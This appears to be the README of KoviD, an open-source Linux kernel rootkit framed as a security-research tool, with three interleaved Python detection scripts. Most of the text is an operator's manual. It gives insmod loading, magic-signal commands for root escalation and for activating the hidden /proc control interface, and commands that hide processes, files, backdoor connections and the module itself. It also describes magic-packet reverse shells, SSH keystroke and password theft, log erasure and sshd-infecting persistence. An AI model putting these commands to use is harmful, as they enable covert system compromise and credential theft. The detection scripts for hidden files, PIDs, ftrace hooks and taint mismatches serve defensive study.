This project is strictly for educational purposes and defensive security research.
Rootkits are typically closed-source threats that operate in shadows, making them difficult to understand and defend against. KoviD exists to change this paradigm by providing an open-source implementation that:
- Empowers security researchers to understand rootkit techniques in a transparent, controlled environment
- Helps system administrators learn how to detect and defend against real-world threats
- Educates students and professionals about kernel-level security vulnerabilities
- Contributes to making Linux more secure by exposing potential attack vectors for defensive purposes
Most rootkits in the wild are closed-source, leaving defenders at a disadvantage. By providing an open-source implementation:
- Security professionals can study real rootkit techniques without reverse-engineering malware
- Defensive tools can be tested against known rootkit behaviors
- The security community can collaborate on detection and prevention methods
- Organizations can prepare their defenses against sophisticated kernel-level threats
WARNING: This software is provided for authorized security testing and educational purposes ONLY.
- DO NOT use this software on systems you do not own or lack explicit permission to test
- DO NOT use this software for any illegal or malicious purposes
- ALWAYS comply with all applicable laws and regulations in your jurisdiction
- REMEMBER: Unauthorized access to computer systems is illegal and unethical
By using this software, you agree to use it responsibly and solely for improving security posture and understanding.
KoviD serves as a comprehensive educational platform for:
- Analyzing rootkit behavior in a controlled, observable environment
- Developing detection signatures for security tools and IDS/IPS systems
- Testing defensive solutions against known rootkit techniques
- Researching kernel security vulnerabilities and mitigation strategies
- Learning to identify signs of rootkit infection
- Understanding attack vectors to better secure production systems
- Testing incident response procedures in safe environments
- Validating the effectiveness of security tools against rootkit techniques
- Hands-on learning about kernel-level security concepts
- Practical demonstrations of theoretical security vulnerabilities
- Research projects on Linux kernel security
- Thesis work on rootkit detection and prevention methods
- Transparency: Open-source code allows the community to understand threats better
- Collaboration: Researchers can work together on detection methods
- Innovation: Drives development of better security tools and kernel hardening
- Preparation: Helps organizations prepare defenses before encountering real threats
KoviD is an open-source Loadable Kernel Module (LKM) security research tool
designed to help security professionals understand and defend against rootkit
techniques in Linux Kernel version 5 and later.
This educational tool demonstrates various rootkit capabilities to help defenders:
• Understand how rootkits hide from detection systems
• Test security monitoring and detection tools
• Learn kernel-level security vulnerabilities
• Develop better defensive strategies
Research capabilities demonstrated include:
• Module concealment techniques from SysFS
• Process hiding mechanisms in proc filesystem
• Log manipulation and evasion techniques
• CPU usage concealment methods
• Privilege escalation vectors
• File and directory hiding approaches
• Network connection concealment
By understanding these techniques, security professionals can better protect systems.
KoviD has influenced the security-research community: it is cited in numerous
papers and analyses, and later tools have adopted technical ideas from it.
• [Phrack magazine](http://phrack.org/issues/71/12.html#article)
Where g1inko works on some challenges posed by `KoviD`
• [Black Hat Arsenal 2025](https://www.youtube.com/watch?v=FKcX-6jReAc)
wetw0rk's awesome [Sickle Payload Framework](https://github.com/wetw0rk/Sickle),
`KoviD` is deployed without touching the disk!
• [Sandfly Security](https://sandflysecurity.com/blog/sandfly-5-3-1-new-license-tiers-and-selinux-support)
Sandfly Agentless Linux Security and stealth rootkit detection techniques
• [Thalium](https://blog.thalium.re/posts/linux-kernel-rust-module-for-rootkit-detection/)
Linux kernel Rust module for rootkit detection
• [Universite de Bordeaux](https://mastercsi.labri.fr/wp-content/uploads/2025/03/Kovid_Rootkit-Charbonnier_Raphel.pdf)
Master CSI KoviD rootkit case study by Charbonnier Elouan & Raphel Elsa
• [Bloo](https://bloo.io/blog/inside-kovid-the-stealthy-linux-kernel-rootkit-threat)
Inside KoviD: The Stealthy Linux Kernel Rootkit Threat
KoviD has also inspired other LKM rootkits with its unique set of features, to name a few:
• Ftrace disabling call interception
• TTY session logging
• Tainted mask manipulation
• Process handling
• BPF introspection operations
• SysFS entries re-addition, essential for debugging and development
A number of public-domain projects have drawn inspiration from KoviD. In some cases developers adapted concepts or reused small code fragments to recreate features that were distinctive to our project:
The APT Down leak contains a rootkit that appears to reuse parts of KoviD, notably the SysFS hide/unhide implementation and helper routines; see the links below.
APT Down - The North Korea Files, leak
We propose building it via Docker, e.g.:

```sh
$ docker build --build-arg BASE_UBUNTU_VERSION=20.04 --build-arg UBUNTU_KERNEL_VERSION=5.15.0-43-generic -t kovid-builder .
```

For more info, check out docs/Automated-Build-With-Docker.md.
Tested on:
- 6.x: Linux 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC x86_64 x86_64 x86_64 GNU/Linux; gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0
- 5.x: Ubuntu 22.04.1 LTS; Linux hash-virtual-machine 5.19.0-41-generic #42~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC UTC 2 x86_64 x86_64 x86_64 GNU/Linux
- 5.x: Linux Standard-PC-Q35-ICH9-2009 5.15.0-43-generic #46-Ubuntu SMP x86_64 x86_64 x86_64 GNU/Linux
- 5.x: Ubuntu 22.04 LTS; Linux 5.15.0-43-generic #46-Ubuntu SMP Tue Jul 12 10:30:17 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux; gcc (Ubuntu 11.2.0-19ubuntu1) 11.2.0
- 5.x: Ubuntu 20.10; Linux ubuntu 5.8.0-55-generic #62-Ubuntu SMP Tue Jun 1 08:21:18 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux; gcc (Ubuntu 10.3.0-1ubuntu1~20.10) 10.3.0
- 5.x: Ubuntu 18.04.5 LTS; Linux ubuntu 5.4.0-89-generic #100~18.04.1-Ubuntu SMP Wed Sep 29 10:59:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux; gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
- 4.x: Debian GNU/Linux 10; Linux debian10teste 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux; gcc (Debian 8.3.0-6) 8.3.0
- 4.x: CentOS Linux release 8.3.2011; 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux; gcc (GCC) 8.3.1 20191121 (Red Hat 8.3.1-5)
KoviD hides itself, making it challenging to detect. It customizes kernel
code to evade anti-rootkit detectors and disappears
from /sys/module listings.
KoviD hides files and directories effectively by hijacking filldir and
filldir64 kernel functions, significantly simplifying the process.
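Two cross-checks a defender can run against readdir-level hiding of the kind the filldir/filldir64 hook above performs, added here as an example that is not part of KoviD: a directory's link count on ext4, xfs or tmpfs still counts subdirectories the listing omits, and a name that is filtered out of getdents() still answers stat() when addressed directly. The lookup callables are injectable so the logic can be tested with a constructed tree; the defaults use the live os.listdir and os.lstat.

```python
"""Defensive cross-checks for readdir-level file hiding.

Added example, not code from KoviD. A hook on filldir/filldir64 only
filters what getdents() returns; the inode itself still answers stat()
when addressed by name, and the parent directory's link count still
includes hidden subdirectories. Both functions take injectable
listing/stat callables so they can be tested without a rootkit.
"""
import os
import stat as st_mod
import sys
from typing import Callable, Iterable, List, Optional


def dir_link_delta(path: str,
                   listing: Callable[[str], Iterable[str]] = os.listdir,
                   stat: Callable[[str], os.stat_result] = os.lstat) -> Optional[int]:
    """Return st_nlink(path) - (2 + visible subdirectories).

    On filesystems that maintain directory link counts (ext4, xfs, tmpfs)
    the result is 0 when nothing is hidden and > 0 when the listing omits
    subdirectories. Returns None when the filesystem reports nlink < 2
    (btrfs, overlayfs), where the count carries no information.
    """
    nlink = stat(path).st_nlink
    if nlink < 2:
        return None
    visible_subdirs = 0
    for name in listing(path):
        try:
            if st_mod.S_ISDIR(stat(os.path.join(path, name)).st_mode):
                visible_subdirs += 1
        except OSError:
            continue  # entry vanished between listing and stat
    return nlink - (2 + visible_subdirs)


def present_but_unlisted(path: str, candidates: Iterable[str],
                         listing: Callable[[str], Iterable[str]] = os.listdir,
                         stat: Callable[[str], os.stat_result] = os.lstat) -> List[str]:
    """Names from `candidates` that stat() finds under `path` but listing() omits."""
    visible = set(listing(path))
    found = []
    for name in candidates:
        if name in visible:
            continue
        try:
            stat(os.path.join(path, name))
        except OSError:
            continue  # genuinely absent
        found.append(name)
    return found


if __name__ == "__main__":
    # Usage: python3 this.py /some/dir [suspicious-name ...]
    target = sys.argv[1] if len(sys.argv) > 1 else "/tmp"
    delta = dir_link_delta(target)
    print(f"{target}: link-count delta = {delta if delta is not None else 'n/a'}")
    print("present but unlisted:", present_but_unlisted(target, sys.argv[2:]))
```

A positive delta names nothing by itself; it tells you how many subdirectories the listing is missing, which is the cue to enumerate the directory through a different path (a raw getdents() from a statically linked binary, or offline from the block device).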
KoviD leverages Ftrace, a legitimate method for
function and syscall hijacking in Kernel v5+.
This approach offers greater stability compared
to traditional hooking techniques.
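Because the hooking method described above registers ftrace callbacks, a defender can enumerate them: the kernel lists every function with an attached ftrace_ops in /sys/kernel/tracing/enabled_functions (older kernels expose it under /sys/kernel/debug/tracing/), and on a host where nothing traces, that file is empty. The following is an added example, not KoviD's code and not from any tool cited on this page; the line layout it assumes follows the kernel's t_show() output, and the module name `kovid`, the callback name `fh_ftrace_thunk` and the whole SAMPLE text are constructed for illustration.

```python
"""Defensive check: which kernel functions currently carry ftrace callbacks.

Added example, not code from KoviD. Ftrace-based hooks register an
ftrace_ops whose callback lives in the module, and the kernel lists every
hooked function in enabled_functions. The assumed line shape follows the
kernel's t_show() output:
    <function> (<count>) <flags>\ttramp: <sym> (<sym>) -><callback sym>
where %pS symbols from modules end in "[modname]". SAMPLE is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

ENABLED_FUNCTIONS = "/sys/kernel/tracing/enabled_functions"

HEAD_RE = re.compile(r"(\S+)\s+\((\d+)\)")         # "__x64_sys_kill (1) R I"
MODULE_RE = re.compile(r"\[([\w\-]+)\]")           # "... +0x0/0x40 [kovid]"
RAW_ADDR_RE = re.compile(r"\b0x[0-9a-f]{8,}\b")    # %pS fell back to a bare address

# Constructed sample: two hooks from a hypothetical module "kovid", one
# in-kernel kprobe user, and one callback the kernel could not symbolise.
SAMPLE = (
    "__x64_sys_kill (1) R I\ttramp: ftrace_regs_caller+0x0/0xd0 "
    "(ftrace_ops_assist_func+0x0/0x130) ->fh_ftrace_thunk+0x0/0x40 [kovid]\n"
    "filldir64 (1) R I\ttramp: ftrace_regs_caller+0x0/0xd0 "
    "(ftrace_ops_assist_func+0x0/0x130) ->fh_ftrace_thunk+0x0/0x40 [kovid]\n"
    "do_sys_open (1)\ttramp: ftrace_caller+0x0/0x70 "
    "(ftrace_ops_list_func+0x0/0x1f0) ->kprobe_ftrace_handler+0x0/0x1c0\n"
    "tcp4_seq_show (1) R I\ttramp: 0xffffffffc0a3b000 (0xffffffffc0a3c120) "
    "->0xffffffffc0a3c120\n"
)


@dataclass
class HookedFunction:
    name: str
    callbacks: int
    modules: List[str] = field(default_factory=list)
    unresolved: bool = False

    @property
    def severity(self) -> str:
        if self.unresolved:
            return "high"    # callback outside any symbol table: review first
        if self.modules:
            return "medium"  # callback in a loadable module: verify that module
        return "info"        # in-kernel tracer (kprobes, livepatch, BPF)


def parse_enabled_functions(text: str) -> List[HookedFunction]:
    """Parse the text of enabled_functions into HookedFunction records."""
    hooked = []
    for line in text.splitlines():
        head, _, rest = line.strip().partition("\t")
        m = HEAD_RE.match(head)
        if not m:
            continue
        entry = HookedFunction(name=m.group(1), callbacks=int(m.group(2)))
        entry.modules = sorted(set(MODULE_RE.findall(rest)))
        entry.unresolved = RAW_ADDR_RE.search(rest) is not None
        hooked.append(entry)
    return hooked


def hooks_by_module(entries: List[HookedFunction]) -> Dict[str, List[str]]:
    """Map each module name to the kernel functions it has hooked."""
    by_mod: Dict[str, List[str]] = {}
    for e in entries:
        for mod in e.modules:
            by_mod.setdefault(mod, []).append(e.name)
    return by_mod


def scan(path: str = ENABLED_FUNCTIONS) -> List[HookedFunction]:
    """Read the live file; an empty result means nothing is ftrace-hooked."""
    with open(path) as f:
        return parse_enabled_functions(f.read())


if __name__ == "__main__":
    for e in parse_enabled_functions(SAMPLE):
        print(f"{e.severity:6} {e.name:20} modules={e.modules or '-'}")
```

The severity is a triage order, not a verdict: a livepatch or kprobe user legitimately appears here, and a module name in brackets is only as trustworthy as the module it points to. Compare the set of hooked functions against what your own tracing and security agents are known to install.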
KoviD incorporates popular and reliable methods for backdooring systems,
such as port-knocking with custom packets. These open connections for
Netcat, OpenSSL, and Socat sessions.
Magic packets trigger netfilter hooks and instruct KoviD to create a
reverse shell connection; the outgoing packets bypass iptables rules,
ensuring effective evasion.
Hiding processes is a crucial feature, giving KoviD the
ability to run undetected. It provides full support for
child processes, ensuring that no hanging processes are left behind.
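A cross-check against process hiding of this kind, added here as an example and not KoviD's or any cited tool's code: enumerate /proc/<pid> by name rather than by listing, then discard the two benign sources of discrepancy, threads (reachable as /proc/<tid> but never listed, and their Tgid differs from the tid) and tasks that exited between passes. All lookups are injectable so the logic can be exercised without a rootkit; the default callables use the live /proc, and scanning up to pid_max (4194304 on many systems) takes several seconds in Python.

```python
"""Defensive check: tasks reachable under /proc that the listing omits.

Added example, not code from KoviD. Hiding a task from ps/top works by
filtering the readdir() output of /proc; the task's /proc/<pid> directory
still answers when opened by name. This brute-forces 1..pid_max by name,
subtracts the listed PIDs, and drops threads and tasks that exited
between passes. The lookup callables are injectable for offline testing.
"""
import os
from typing import Callable, List, Set


def listed_pids(proc: str = "/proc") -> Set[int]:
    """PIDs that readdir() on /proc reports."""
    return {int(n) for n in os.listdir(proc) if n.isdigit()}


def read_pid_max(path: str = "/proc/sys/kernel/pid_max", default: int = 32768) -> int:
    try:
        with open(path) as f:
            return int(f.read().strip())
    except OSError:
        return default


def probe_pids(pid_max: int, proc: str = "/proc") -> Set[int]:
    """PIDs whose /proc/<pid> directory exists when addressed by name."""
    found = set()
    for pid in range(1, pid_max + 1):
        try:
            os.lstat(f"{proc}/{pid}")
        except OSError:
            continue
        found.add(pid)
    return found


def is_thread_group_leader(pid: int, proc: str = "/proc") -> bool:
    """True when /proc/<pid>/status reports Tgid == pid (a process, not a thread)."""
    try:
        with open(f"{proc}/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except (OSError, ValueError):
        return False
    return False


def find_hidden_pids(listing: Callable[[], Set[int]] = listed_pids,
                     probe: Callable[[int], Set[int]] = probe_pids,
                     leader: Callable[[int], bool] = is_thread_group_leader,
                     pid_max: int = 0) -> List[int]:
    """PIDs present by name, absent from the listing, confirmed on a second pass."""
    pid_max = pid_max or read_pid_max()
    candidates = probe(pid_max) - listing()
    hidden = []
    for pid in sorted(candidates):
        if not leader(pid):
            continue            # a thread, or it already exited
        if pid in listing():
            continue            # appeared late: it was just starting up
        hidden.append(pid)
    return hidden


if __name__ == "__main__":
    found = find_hidden_pids()
    print("hidden PIDs:", found if found else "none")
```

A non-empty result is worth correlating with the process's /proc/<pid>/exe link and its cmdline before acting; a rootkit that also filters lookups by name, rather than only the directory listing, defeats this particular check, which is why it belongs alongside network- and kernel-side checks rather than replacing them.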
KoviD's hidden tasks result in missing logs, making it
even more challenging for administrators to detect its
presence. It eliminates logs generated by userland tools
like w, lsmod, ps, who, ls.
KoviD hides network connections and manipulates network logs
to maintain stealth for backdoors, covering libpcap and recvmsg
consumers (ss, tcpdump, netstat...).
Gain root privileges easily with `kill -SIGCONT 666`.
KoviD hides CPU consumption, making its processes invisible
as heavy consumers. However, be cautious not to max out the CPU,
as this can lead to unusual usage patterns.
KoviD offers persistence via Volundr. It can infect executables,
like SSHD, to ensure KoviD loads on reboot. You can also use your
preferred tool; Volundr is just a suggestion here.
KoviD allows for the retrieval of base addresses of other executables
without needing to open /proc/<pid>/maps.
KoviD can evade a few anti-rootkit tools that rely on BPF
(Berkeley Packet Filter) for detecting rootkits.
Tested against: https://github.com/pathtofile/bpf-hookdetect.git
```sh
$ sudo insmod ./kovid.ko
$ cat /proc/sys/kernel/tainted
0
```
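A tainted value of 0 right after an out-of-tree, unsigned module has been loaded is itself the anomaly a defender can look for: such a load normally sets the O (bit 12) and E (bit 13) flags. The following is an added example, not KoviD's code, that decodes the taint mask and cross-checks it against the taint letters each visible module carries at the end of its /proc/modules line, e.g. "(OE)". The flag table follows Documentation/admin-guide/tainted-kernels.rst; MODULES_SAMPLE, including the module names in it, is constructed.

```python
"""Defensive check: taint mask vs. the taint letters of loaded modules.

Added example, not code from KoviD. Decodes /proc/sys/kernel/tainted and
verifies that the global mask includes every taint letter any module in
/proc/modules carries; a module marked (OE) while the mask reads 0 means
the mask was cleared after the load. MODULES_SAMPLE is constructed.
"""
import re
from typing import Dict, List, Set, Tuple

# (bit, letter, meaning) from Documentation/admin-guide/tainted-kernels.rst
TAINT_FLAGS = [
    (0, "P", "proprietary module was loaded"),
    (1, "F", "module was force loaded"),
    (2, "S", "kernel running on an out of specification system"),
    (3, "R", "module was force unloaded"),
    (4, "M", "processor reported a Machine Check Exception"),
    (5, "B", "bad page referenced or unexpected page flags"),
    (6, "U", "taint requested by userspace application"),
    (7, "D", "kernel died recently (OOPS or BUG)"),
    (8, "A", "ACPI table overridden by user"),
    (9, "W", "kernel issued a warning"),
    (10, "C", "staging driver was loaded"),
    (11, "I", "workaround for a platform firmware bug applied"),
    (12, "O", "externally-built (out-of-tree) module was loaded"),
    (13, "E", "unsigned module was loaded"),
    (14, "L", "soft lockup occurred"),
    (15, "K", "kernel has been live patched"),
    (16, "X", "auxiliary taint, defined by distributions"),
    (17, "T", "kernel built with the struct randomization plugin"),
    (18, "N", "an in-kernel test has been run"),
]

# Trailing "(OE)" / "(OE+)" on a /proc/modules line; "+"/"-" mark load/unload in progress.
MODULE_TAINT_RE = re.compile(r"\(([A-Z+\-]+)\)\s*$")

# Constructed sample: a hypothetical out-of-tree module, a hypothetical
# proprietary one, and an in-tree module with no taint letters.
MODULES_SAMPLE = (
    "kovid 40960 0 - Live 0x0000000000000000 (OE)\n"
    "vendor_blob 56000000 12 - Live 0x0000000000000000 (POE)\n"
    "ext4 1048576 1 - Live 0x0000000000000000\n"
)


def decode_taint(value: int) -> List[str]:
    """Letters set in a /proc/sys/kernel/tainted value, lowest bit first."""
    return [letter for bit, letter, _ in TAINT_FLAGS if value & (1 << bit)]


def explain_taint(value: int) -> List[str]:
    """Human-readable lines for each flag set in `value`."""
    return [f"{letter}: {meaning}" for bit, letter, meaning in TAINT_FLAGS if value & (1 << bit)]


def parse_modules(text: str) -> Dict[str, Set[str]]:
    """Module name -> set of taint letters from its /proc/modules line."""
    mods: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        m = MODULE_TAINT_RE.search(line)
        mods[parts[0]] = (set(m.group(1)) - {"+", "-"}) if m else set()
    return mods


def taint_inconsistencies(taint_value: int, modules_text: str) -> List[Tuple[str, str]]:
    """Modules whose own taint letters are missing from the global mask."""
    global_letters = set(decode_taint(taint_value))
    bad = []
    for name, letters in parse_modules(modules_text).items():
        missing = "".join(sorted(letters - global_letters))
        if missing:
            bad.append((name, missing))
    return bad


def check_live() -> List[Tuple[str, str]]:
    """Run the cross-check against the running kernel."""
    with open("/proc/sys/kernel/tainted") as f:
        taint = int(f.read().strip())
    with open("/proc/modules") as f:
        return taint_inconsistencies(taint, f.read())


if __name__ == "__main__":
    print("decoded 12288:", explain_taint(12288))
    print("inconsistent with mask 0:", taint_inconsistencies(0, MODULES_SAMPLE))
```

Once a module has also removed itself from /proc/modules, this cross-check has nothing left to compare, so treat it as one signal among several: a host known to carry out-of-tree or unsigned modules whose mask unexpectedly lacks O or E deserves the same scrutiny as a direct mismatch.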
Before compiling and loading KoviD, edit the Makefile to choose a unique
name for /proc/<name>; ensure the chosen name is not easily predictable.
Compile and load KoviD with `sudo insmod kovid.ko`.
To enable the /proc/mytest interface, run:

```sh
$ kill -SIGCONT 31337
```

The interface disables itself after 120 seconds and can be
reactivated with the same command.
Some commands can return a status code.
Enable status codes:

```sh
$ echo output-enable >/proc/mytest
$ cat /proc/mytest
1
$ echo output-disable >/proc/mytest
$ cat /proc/mytest
0
```

0: disabled
1: enabled

Command example after output-enable:

```sh
$ echo hide-lkm >/proc/mytest
$ cat /proc/mytest
0
```
You can hide/unhide processes using the /proc/mytest interface.
For example, to hide a task, run:

```sh
$ echo 14886 >/proc/mytest
```

If a task is a backdoor that needs TCP hiding, run:

```sh
$ echo hide-task-backdoor=<pid> >/proc/mytest
```

Unhiding is the same as for regular tasks:

```sh
$ echo "<PID>" >/proc/mytest
```

To hide the KoviD module, use `$ echo hide-lkm >/proc/mytest`.
In release mode, the module is hidden by default,
and a key can be displayed by running `$ cat /proc/mytest`.
To hide a file or directory, use:

```sh
$ echo hide-file=/tmp/README.txt >/proc/mytest
```

To unhide, use:

```sh
$ echo unhide-file=README.txt >/proc/mytest
```

You can list hidden file and directory names with:

```sh
$ echo list-hidden-file >/proc/mytest
```
KoviD can snoop SSH sessions via TTY keystrokes and steal passwords
and commands effectively.
For instructions, run `scripts/bdclient.sh`; a help list is displayed.
As with any software, KoviD may have bugs.
If you encounter issues or oopses, please report them in detail for
potential fixes. Test KoviD extensively, preferably in a VM that
mimics the target environment.
Disclaimer: The use of KoviD on a real target is discouraged.